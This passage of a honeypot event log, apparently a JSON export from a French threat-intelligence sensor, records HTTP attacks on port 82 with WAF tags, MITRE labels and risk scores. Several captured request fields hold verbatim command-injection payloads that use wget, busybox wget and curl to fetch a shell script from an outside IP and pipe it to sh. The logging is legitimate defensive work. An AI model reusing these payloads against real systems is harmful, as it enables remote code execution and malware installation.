\u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20advan%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/edgserver\/capture_packages?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bcurl%20http:\/\/\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/edgserver\/capture_packages?param=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20advan%3Bbusybox%20wget\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 8 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":293},{"id":11809385,"ip":"45.153.34.219","ts":"2026-07-14 02:18:16.000000","proto":"tcp","src_port":54810,"dst_port":82,"service":"http","classification":"cmd_injection","waf_score":41,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/command.php","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022php\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u0022387fa52c89852ad587baa76ccfb83021cdde7544\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 304, \u0022payload_entropy\u0022: 5.172932736615583, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 10, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022fdea675a9e9cfa4a884b573eb6859264ce6c6ab9\u0022, \u0022event_fingerprint\u0022: \u002231decf592ecf2f8740e4b32c1b13a1d0a902fe3e\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022c6a88689c00470849f84ff2db718570a\u0022, \u0022path_pattern_hash\u0022: \u0022ae299b1b73fdd9de9a67e4429bae2022\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/command.php HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnectio\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/command.php\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/command.php HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/command.php HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnection: close\\r\\n\\r\\ncmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s dlcmd;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s dlc\u0022, \u0022payload_snippet\u0022: \u0022POST \/command.php HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnectio\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/command.php\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/command.php HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/command.php HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnection: close\\r\\n\\r\\ncmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s dlcmd;busybox wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s dlc\u0022, \u0022payload_snippet\u0022: \u0022POST \/command.php HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnectio\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u002267f178fcfd2eca90796da695f9ac9397fcdfeed8\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/command.php\u0022, \u0022request_line\u0022: \u0022POST \/command.php HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/command.php HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnectio\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/command.php\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/command.php\u0022, \u0022request_line\u0022: \u0022POST \/command.php HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/command.php\u0022, \u0022evidence_snippet\u0022: \u0022POST \/command.php HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnectio\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]","anomalies":"[]","severity":10,"bytes_in":304},{"id":11809386,"ip":"45.153.34.219","ts":"2026-07-14 02:18:16.000000","proto":"tcp","src_port":54814,"dst_port":82,"service":"http","classification":"config_file_probe","waf_score":48,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u002236a2335d4f2b979a1e3edec5c7dfb201adb24fc1\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 274, \u0022payload_entropy\u0022: 5.0571646724235375, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 74.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 64, \u0022tag_count\u0022: 12, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u00226dfa50d5e1f792392fb4146ab16929105b1cccdd\u0022, \u0022event_fingerprint\u0022: \u0022776e0a4de0f89cd3cda89f2abb0e180f939aadf2\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 127, \u0022precision_signals\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022backup_file_scan\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u002212c47ce0b71d4f7f51da497b1d05d65c\u0022, \u0022path_pattern_hash\u0022: \u0022f6e9baaa731f11923b2ba9541a8713d5\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 64}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60\u0022, \u0022query_string\u0022: \u0022cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60\u0022, \u0022query_string\u0022: \u0022cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/login.cgi?cli=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlcli%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlcli%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET 